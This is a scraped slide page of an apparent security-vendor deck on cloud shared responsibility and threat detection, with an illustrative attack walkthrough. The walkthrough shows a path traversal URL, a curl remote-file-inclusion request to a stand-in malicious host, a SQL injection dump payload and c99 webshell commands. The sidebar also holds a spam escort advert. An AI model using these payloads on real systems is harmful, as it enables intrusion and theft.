Microsoft Azure Security Overview - Microsoft - CSS Dallas AzureMicrosoft Azure Security Overview - Microsoft - CSS Dallas Azure
Microsoft Azure Security Overview - Microsoft - CSS Dallas AzureAlert Logic
 

Más de Alert Logic (19)

Extending Amazon GuardDuty with Cloud Insight Essentials
Extending Amazon GuardDuty with Cloud Insight Essentials Extending Amazon GuardDuty with Cloud Insight Essentials
Extending Amazon GuardDuty with Cloud Insight Essentials
 
Extending Amazon GuardDuty with Cloud Insight Essentials
Extending Amazon GuardDuty with Cloud Insight Essentials Extending Amazon GuardDuty with Cloud Insight Essentials
Extending Amazon GuardDuty with Cloud Insight Essentials
 
The AWS Shared Responsibility Model in Practice
The AWS Shared Responsibility Model in PracticeThe AWS Shared Responsibility Model in Practice
The AWS Shared Responsibility Model in Practice
 
Security Spotlight: Presidio
Security Spotlight: PresidioSecurity Spotlight: Presidio
Security Spotlight: Presidio
 
Security Spotlight: Rent-A-Center
Security Spotlight: Rent-A-CenterSecurity Spotlight: Rent-A-Center
Security Spotlight: Rent-A-Center
 
The Intersection of Security & DevOps
The Intersection of Security & DevOpsThe Intersection of Security & DevOps
The Intersection of Security & DevOps
 
Security Spotlight: Presidio
Security Spotlight: PresidioSecurity Spotlight: Presidio
Security Spotlight: Presidio
 
Security Implications of the Cloud
Security Implications of the CloudSecurity Implications of the Cloud
Security Implications of the Cloud
 
Reducing Your Attack Surface & Your Role in Cloud Workload Protection
Reducing Your Attack Surface & Your Role in Cloud Workload ProtectionReducing Your Attack Surface & Your Role in Cloud Workload Protection
Reducing Your Attack Surface & Your Role in Cloud Workload Protection
 
Realities of Security in the Cloud
Realities of Security in the CloudRealities of Security in the Cloud
Realities of Security in the Cloud
 
CSS 2018 Trivia
CSS 2018 TriviaCSS 2018 Trivia
CSS 2018 Trivia
 
The AWS Shared Responsibility Model in Practice
The AWS Shared Responsibility Model in PracticeThe AWS Shared Responsibility Model in Practice
The AWS Shared Responsibility Model in Practice
 
Realities of Security in the Cloud
Realities of Security in the CloudRealities of Security in the Cloud
Realities of Security in the Cloud
 
The Intersection of Security and DevOps
The Intersection of Security and DevOpsThe Intersection of Security and DevOps
The Intersection of Security and DevOps
 
Security Spotlight: The Coca Cola Company
Security Spotlight: The Coca Cola CompanySecurity Spotlight: The Coca Cola Company
Security Spotlight: The Coca Cola Company
 
Reducing Your Attack Surface and Yuor Role in Cloud Workload Protection
Reducing Your Attack Surface and Yuor Role in Cloud Workload ProtectionReducing Your Attack Surface and Yuor Role in Cloud Workload Protection
Reducing Your Attack Surface and Yuor Role in Cloud Workload Protection
 
The AWS Shared Responsibility Model in Practice
The AWS Shared Responsibility Model in PracticeThe AWS Shared Responsibility Model in Practice
The AWS Shared Responsibility Model in Practice
 
Security Implications of the Cloud
Security Implications of the CloudSecurity Implications of the Cloud
Security Implications of the Cloud
 
Microsoft Azure Security Overview - Microsoft - CSS Dallas Azure
Microsoft Azure Security Overview - Microsoft - CSS Dallas AzureMicrosoft Azure Security Overview - Microsoft - CSS Dallas Azure
Microsoft Azure Security Overview - Microsoft - CSS Dallas Azure
 

Último

Evaluating the top large language models.pdf
Evaluating the top large language models.pdfEvaluating the top large language models.pdf
Evaluating the top large language models.pdfChristopherTHyatt
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Miguel Araújo
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherRemote DBA Services
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEarley Information Science
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Neo4j
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProduct Anonymous
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slidevu2urc
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsJoaquim Jorge
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Servicegiselly40
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdflior mazor
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfsudhanshuwaghmare1
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Drew Madelung
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century educationjfdjdjcjdnsjd
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 

Último (20)

Evaluating the top large language models.pdf
Evaluating the top large language models.pdfEvaluating the top large language models.pdf
Evaluating the top large language models.pdf
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdf
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 

Realities of Security in the Cloud

  • 2. Security is a challenge.
  • 4. Security in the Cloud is a Shared Responsibility PROVIDES • Secure coding and best practices • Software and virtual patching • Configuration management • Access management • Application level attack monitoring • Access management • Patch management • Configuration hardening • Security monitoring • Log analysis • Network threat detection • Security monitoring • Logical network segmentation • Perimeter security services • External DDoS, spoofing, and scanning prevented • Hardened hypervisor • System image library • Root access for customer • Configuration best practices
  • 5. Let’s talk about security coverage.
  • 6. Tame the Beast Industry Challenge: The Good, the Bad and the Ugly Known Good Known Bad Suspicious Allow Identify | Tune | Permit Block Drop | Reconfigure Application Stack Web Apps Server-side Apps App Frameworks Dev Platforms Databases Server OS Hypervisor Hardware Classification Action HUMAN EXPERT REQUIRED
  • 7. Classic 3-Tier Web Application Key Target Assets Key target assets for attack Across the Full Stack 1. Custom application 2. Web server implementation Apache, IIS, NGINGX 3. Application server implementation Tomcat, Jboss, Jetty, ASP 4. Web server frameworks and languages Struts, PHP, Java 5. Databases mySql, Oracle, MSSQL,.. 6. AWS services IAM, EC2, S3 EC2 instances EC2 instances VPC Route 53 Users Internet gateway ELB DB instance DB instance AvailabilityzoneAAvailabilityzoneB Auto scaling group Web App Server Auto scaling group S3 EC2 instances EC2 instances
  • 8. An attack scenario - Recon VPC Route 53 Internet gateway ELB mySQL instance On linux AvailabilityzoneAAvailabilityzoneB S3 Bastion Host PHP Application On Linux 1 – Performs low-frequency app-scan 2 – Tests path traversal and enumerates directories 3 – Tests remote file inclusion Recon Recon • low slow application level scan • Attacker learns PHP app, on linux, likely mySql DB • Suspects vulnerabilities • tests potential path traversal vulnerability /bWAPP/directory_traversal_2.php?directory=.. /../../../etc • Path traversal is successful. Attacker enumerates server directories. • tests remote file inclusion vulnerability Curl -X POST -F 'url=http [://] malicious [dot] com/test.php' http [://] mysite [dot] com/wp-content/plugins/site- import/admin/page.php> Attacker learnings: vulnerable PHP/mySql app, prone to both smash’n grab attacks as more persistent attack approaches
  • 9. Entry and data exfiltration • Attacker launches a series of SQL-I injection discovery attempts • Gets a dump-in-one-shot attack and gets full table return http://victim.com/report.php?id=23 and(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.schemata)where (@a)in (@a:=concat(@a,schema_name,'<br>'))))a) Attacker achievements: obtained sensitive customer-data without need for local process or system breaches on servers An attack scenario – opportunistic exfiltration VPC Route 53 Internet gateway ELB mySQL instance On linux AvailabilityzoneAAvailabilityzoneB S3 Bastion Host PHP Application On Linux 4 - SQL-I data extraction attack Recon • low slow application level scan • Attacker learns PHP app, on linux, likely mySql DB • Suspects vulnerabilities • tests potential path traversal vulnerability /bWAPP/directory_traversal_2.php?directory=../../../../etc • Path traversal is successful. Attacker enumerates server directories. • tests remote file inclusion vulnerability Curl -X POST -F 'url=http [://] malicious [dot] com/test.php' http [://] mysite [dot] com/wp-content/plugins/site-import/admin/page.php> Attacker learnings: vulnerable PHP/mySql app, prone to both smasn’n grab attacks as more persistent attack approaches Entry/Exfil
  • 10. VPC Route 53 Internet gateway ELB mySQL instance On linux AvailabilityzoneAAvailabilityzoneB S3 Bastion Host PHP Application On Linux 5 - Webshell injection 6 - Commanding through Shell Command and control (C&C) • Attacker uploads c99 webshell via RFI vulnerability • Persistent foothold for lateral movement established curl -X POST -F 'act=search' -F 'grep=' -F 'fullhexdump=' -F 'base64=' -F 'nixpasswd=' -F 'pid=' -F 'c=' -F 'white=' -F 'sig=' -F 'processes_sort=' -F 'd=/var/www/' -F 'sort=' -F 'f=' -F 'ft=' http [://] mysite [dot] com/path/to/c99 Attacker achievements: obtained foothold for further action and lateral movement Entry and data exfiltration • Attacker launches a series of SQL-I injection attempts • Gets a dump-in-one-shot attack and gets full table return Attacker achievements: obtained sensitive customer-data without need for local process or system breaches on servers Recon • low slow application level scan • Attacker learns PHP app, on linux, likely mySql DB • Suspects vulnerabilities • tests potential path traversal vulnerability /bWAPP/directory_traversal_2.php?directory=../../../../etc • Path traversal is successful. Attacker enumerates server directories. • tests remote file inclusion vulnerability (RFI) Attacker learnings: vulnerable PHP/mySql app, prone to both smasn’n grab attacks as more persistent attack approaches An attack scenario – persistent foothold Command and control
  • 11. Deep Application threat visibility Network inspection Expert SOC Analysis of Findings Network, system, application infrastructure threat visibility Alert Logic’s Approach Cloudtrail Config&VulnAssessment Foundation Asset and exposure visibility Log Collection HTTP Inspection Expert Curation, R&D of Content and Intel Analytics and Machine Learning Content and Intel Application level Web Attacks OWASP Top 10 Attacks against vulnerable platforms and libraries Attacks against miscon- figurations
  • 12. Coverage needed for this scenario Low slow scan Path traver sal RFI SQLi Web shell Recon Entry Exfil C&C Cloudtrail Overall combined coverage scorecard No coverage Vulnerability coverage only Basic Threat Coverage Deep threat coverage How much can we see?
  • 13. Coverage needed for this scenario Foundation Asset and exposure visibility Low slow scan Path traver sal RFI SQLi Web shell Config and vulnerability assessment will reveal vulnerabilities present that attackers can exploit. Actual attacks in motion can not be detected with vuln and config scanning Recon Entry Exfil C&C Cloudtrail Config&VulnAssessment Overall combined coverage No coverage Vulnerability coverage only Basic Threat Coverage Deep threat coverage
  • 14. Network, system, application infrastructure threat visibility Coverage needed for this scenario Foundation Asset and exposure visibility Low slow scan Path traver sal RFI SQLi Web shell Config and vulnerability assessment will reveal vulnerabilities present that attackers can exploit. Actual attacks in motion can not be detected with vuln and config scanning Network inspection providers visibility on attacker actions on the known vulnerabilities exploited in the attack and their success Recon Entry Exfil C&C Network inspection Cloudtrail Config&VulnAssessment Overall combined coverage No coverage Vulnerability coverage only Basic Threat Coverage Deep threat coverage
  • 15. Deep Application threat visibility Network, system, application infrastructure threat visibility Coverage needed for this scenario Foundation Asset and exposure visibility Low slow scan Path traver sal RFI SQLi Web shell Config and vulnerability assessment will reveal vulnerabilities present that attackers can exploit. Actual attacks in motion can not be detected with vuln and config scanning Network inspection providers visibility on attacker actions on the known vulnerabilities exploited in the attack and their success Deep HTTP inspection on requests and responses, learning and anomaly detection deepens coverage for whole classes of application attacks Recon Entry Exfil C&C Network inspection Cloudtrail Config&VulnAssessment Log Collection HTTP Inspection Overall combined coverage No coverage Vulnerability coverage only Basic Threat Coverage Deep threat coverage
  • 16. SECURITY EXPERTS Integrated Security Model Incident Investigation System Visual | Context | Hunt Data & Event Sources Assets | Config | Logs Automatic Detection Block | Alert | Log ML Algorithms Rules & Analytics Security Researchers Data Scientists Software Programmers Integrated: Infrastructure | Content | Human Experts Security Analysts
  • 17. We designed security for cloud and hybrid environments GET STARTED IN MINUTES MAINTAIN COVERAGE AT CLOUD SCALE KEEP PRODUCTION FLOWING with modular services that grow with you Comply with integration to cloud APIs and DevOps automation with auto-scaling support and out-of-band detection Single pane of glass for workload and application security across cloud, hosted & on-premises
  • 18. Leaders 28 8 6 4 10 25 3 5 5 11 8 10 15 24 Other Amazon Check Point Chronicle Data Cisco Fortinet Intel Security Okta Symantec Barricade JumpCloud Evident.io Palerra Microsoft CloudPassage CloudCheckr FortyCloud ThreatStack Alert Logic A recognized security leader “Alert Logic has a head start in the cloud, and it shows.” PETER STEPHENSON SC Magazine review “…the depth and breadth of the offering’s analytics and threat management process goes beyond anything we’ve seen…”Who is your primary in-use vendor for Cloud Infrastructure Security? Who are the top vendors in consideration for Cloud Infrastructure Security? Alert Logic
  • 19. Over 4,000 worldwide customers AUTOMOTIVE HEALTHCARE EDUCATION FINANCIAL SERVICES MANUFACTURING MEDIA/PUBLISHING RETAIL/E-COMMERCE ENERGY & CHEMICALS TECHNOLOGY & SERVICES GOV’T / NON-PROFIT